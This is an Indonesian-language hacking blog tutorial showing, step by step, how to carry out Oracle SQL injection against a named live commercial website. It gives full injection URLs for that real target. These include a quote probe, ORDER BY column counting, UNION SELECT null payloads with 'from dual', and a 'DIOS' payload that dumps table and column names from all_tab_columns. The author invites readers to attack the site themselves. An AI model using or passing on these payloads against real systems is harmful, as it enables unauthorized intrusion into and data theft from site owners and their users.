Assalamualaikum warahmatullahi wabarakatuh alhamdulillahirobbilalamin, Kembali lagi bersama saya kali ini saya akan melanjutkan tutorial Bagaimana cara mengerjakan Oracle database SQL injection.
Saya ingin sedikit bercerita tadinya banyak yang meminta request cara mengerjakan SQLlite untuk materi, tapi saya sudah izin kepada yang punya blogger ini untuk mengerjakan Oracle database injection terlebih dahulu.
Baiklah tanpa berlama-lama saya langsung berikan live targetnya kepada kalian, sebelum itu saya sarankan untuk melihat artikel-artikel sebelumnya yang sudah saya berikan kepada kalian agar sekiranya kalian lebih memahami apa yang saya jelaskan untuk artikel kali ini.
Live target :: https://impozapaterias.com/impo/Producto.php?id=1184-1102-16597&Talla=todas
Baiklah langsung saja kita akan eksekusi website ini pertama-tama kalian buka dari HD hackbar dan pastekan saja live target yang di atas, kita lihat tampilan awalnya dan Lihatlah gambar di bawah ini.
https://impozapaterias.com/impo/Producto.php?id=1184-1102-16597&Talla=todas
Beginilah tampilan awal dari website ini dan langsung saja kita berikan single quote untuk memastikan Apakah website ini benar-benar vuln, Perhatikan gambar di bawah ini Ketika saya memberikan single quote pada website ini.
https://impozapaterias.com/impo/Producto.php?id=1184-1102-16597'&Talla=todas
Lihatlah website ini Ketika saya memberikan single quote tampilannya sudah error dan tertera keterangan : Warning: oci_parse(): ORA-01756: quoted string not properly terminated in C:\xampp\htdocs\impozapaterias\impo\Producto.php on line
Sedikit pemberitahuan untuk kalian Saya ingin meluruskan dan membenarkan pemahaman yang salah, jadi errornya website Oracle kebanyakan mereka memiliki peringatan atau warning di indeksnya ketika error.
Perhatikan gambar di bawah ini Ketika saya memberikan url balancer untuk menormalkan website ini.
Yap websitenya sudah normal kembali Walau ada peringatan warning error pada website, tapi jika kalian teliti coba perhatikan Ketika saya memberikan single quote tanpa URL balancer dan bedakan Ketika saya sudah memberikan url balancer pada website yang telah diberikan single quote ini, pasti ada perbedaan dan kalian pasti bertanya-tanya bedanya di mana?
Coba kalian perhatikan saja warningnya atau errornya ketika dia benar-benar sudah error itu akan tampil lebih banyak warning tapi ketika websitenya normal warningnya akan berkurang atau tidak ada satupun.
Baiklah Semoga saja bisa dimengerti jika tidak perhatikan saja atau diulang-ulang artikel ini, Perhatikan gambar di bawah ini Ketika saya menghitung angka kolomnya menggunakan order by.
https://impozapaterias.com/impo/Producto.php?id=1184-1102-16597'ORDER BY 8--+-&Talla=todas
Ketika saya memberikan order by 8 maka akan terlihat pada indexnya yang memunculkan warning pada errornya begitu banyak.
Begitu pula sebaliknya ketika saya ketika saya memberikan ORDER BY 7 pada websitenya, perhatikan gambar dibawah.
https://impozapaterias.com/impo/Producto.php?id=1184-1102-16597'ORDER BY 7--+-&Talla=todas
Kalian bedakan saja Apa bedanya antara 7 dan 8 sudah pasti berbeda walau ada warningnya atau peringatan errornya tapi kita bisa memastikan Dan Kita sudah tahu di bagian mana errornya dan di bagian mana yang seharusnya menjadi angkat target.
Yaps benar sekali angka normalnya adalah angka 7 dan angka errornya adalah Angka 8 Mari langsung saja kita eksekusi menggunakan Union select.
Sedikit peringatan atau pemberitahuan website ini atau website tipe ini tidak ada bedanya dengan website sebelumnya yaitu POSTGRE sql injection, Yap mereka itu 11 12 cara mengerjakannya tapi memiliki perbedaan antar keduanya mulai dari DIOS dan lain sebagainya perhatikan saja di mana perbedaannya.
Perhatikan gambar di bawah ini Ketika saya memberikan Union select, dan ingat pada website sebelumnya yaitu POSGTRE yang menggunakan null dan 1=0 pada prosesnya, mari kita samakan.
https://impozapaterias.com/impo/Producto.php?id=1184-1102-16597'AND 1=0 UNION SELECT null,null,null,null,null,null,null--+-&Talla=todas
Ya beginilah cara mengerjakannya tapi pertanyaannya adalah Mengapa website itu tetap error padahal cara mengerjakannya Sudah sama yaitu menggunakan null dan 1=0, bagi kalian yang tidak mengetahui apa itu 1=0 di artikel sebelumnya juga sudah saya jelaskan bahwa 1=0 bisa di jabarkan dengan "true dan false" baiklah perbedaannya ada di sini, Perhatikan gambar di bawah ini.
https://impozapaterias.com/impo/Producto.php?id=1184-1102-16597'AND 1=0 UNION SELECT null,null,null,null,null,null,null from dual--+-&Talla=todas
Kalian sudah tahu kan di mana perbedaannya yaitu kita tinggal menambahkan from dual pada akhir null, dan sudah terlihat bahwa websitenya sudah normal kembali Walau "websitenya terlihat error dikarenakan memiliki warning"
Baiklah langsung saja kita cari angka injeksinya untuk meratakan bios pada angka tersebut untuk memunculkan seluruh database-nya, cara mencari angka injeksi pada website Oracle dan postgre Tak ada bedanya bahkan di artikel sebelumnya juga sudah saya jelaskan bahwa mencari barang pada tipe posgre menggunakan single quote atau '
Kita coba cari dan perhatikan website dibawah ini dengan seksama.
https://impozapaterias.com/impo/Producto.php?id=1184-1102-16597'AND 1=0 UNION SELECT 'null',null,null,null,null,null,null from dual--+-&Talla=todas
Saya menemukan di null pertama Baiklah langsung saja kita eksekusi dengan menggunakan DIOS Oracle, untuk penjelasan dios sudah saya jelaskan di artikel sebelumnya yaitu setiap tipe website memiliki perbedaan antara websitenya baik itu waffnya ataupun diosnya.
Untuk diosnya ::
(select wm_concat('<li>'||table_name||' ==> '||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120)
Perhatikan gambar dibawah ini ketika saya sudah memberikan diosnya.
https://impozapaterias.com/impo/Producto.php?id=1184-1102-16597'AND 1=0 UNION SELECT (select wm_concat('<li>'||table_name||' ==> '||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120),null,null,null,null,null,null from dual--+-&Talla=todas
Iya kenapa diosnya berbeda dengan image saya, karena diosnya saya potong sedemikian rupa agar tidak memiliki print systemnya.
Baiklah hanya ini saja yang dapat saya sampaikan kurang lebih saya mohon maaf bila ada kesalahan kata juga saya mohon maaf kepada Allah saya mohon ampun, wallahul muwafiq ila,aqwami Thoriq
Assalamualaikum warahmatullahi wabarakatuh
By :: ./numb_X12